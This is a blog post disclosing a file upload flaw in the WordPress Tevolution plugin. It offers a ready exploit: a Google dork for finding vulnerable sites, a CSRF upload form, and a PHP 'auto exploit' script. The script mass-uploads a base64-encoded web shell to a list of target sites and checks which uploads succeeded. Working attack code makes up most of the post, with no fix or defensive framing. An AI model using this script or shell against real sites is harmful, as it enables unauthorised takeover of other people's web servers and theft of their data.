Saturday, February 18, 2017
Wordpress Tevolution Plugin File Upload Vulnerability
Wordpress Tevolution Plugin File Upload Vulnerability
#- Author: unknown
#- Date: 2016
#- Developer : templatic
#- Link Download : templatic. com/wordpress-plugins/tevolution
#- Google Dork: inurl:"/plugins/Tevolution/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
The Tevolution WordPress plugin enables advanced functionality in our themes. Some of the features it enables include custom post types, monetization options, custom fields… Cool thing about Tevolution is the fact it’s modular, meaning you can turn off the features you do not need.
Vulnerability : site/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
When Vulnerable :Maybe "Blank"
-- Method --
CSRF
<form
action="http://3xploi7.blogspot.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>
Tevolution Auto Exploit Coded by IndoXploit
<html>
<center>
<form method="post" enctype="multipart/form-data">
Shellname: <br><input type="text" name=filename style=width: 500px; height="10" value=indoxploit.php.xxxjpg required><br>
Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
<input type=submit name=exp value=Hajar! style=width: 500px;>
</form>
<?php
// IndoXploit
set_time_limit(0);
error_reporting(0);
function buffer() {
ob_flush();
flush();
}
function curl($url, $payload) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_COOKIEJAR, cookie.txt);
curl_setopt($ch, CURLOPT_COOKIEFILE, cookie.txt);
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER[HTTP_USER_AGENT]);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
$file = htmlspecialchars($_POST[filename]);
$site = explode(" ", $_POST[url]);
$do = $_POST[exp];
$uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
if($do) {
$y = date("Y");
$m = date("m");
$idx_dir = mkdir("indoxploit_tools", 0755);
$shell = "indoxploit_tools/".$file;
$fopen = fopen($shell, "w");
fwrite($fopen, $uploader);
fclose($fopen);
foreach($site as $url) {
$target = $url./wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php;
$cek_shell = "$url/wp-content/uploads/$y/$m/$file";
$data = array(
"Filedata" => "@$shell"
);
$curl = curl($target, $data);
if($curl) {
$cek = file_get_contents($cek_shell);
if(preg_match("/IndoXploit - Auto Xploiter/is", $cek)) {
echo "<a href=$cek_shell target=_blank>$cek_shell</a> -> shellmu<br>";
}
}
buffer();
}
}
?>
Format Shell > php, php4, php5, php.xxxjpg, php.asp Etc.
If Succesfully [3xploi7.php4]
Need Shell Path ? Click Here
Available link for download
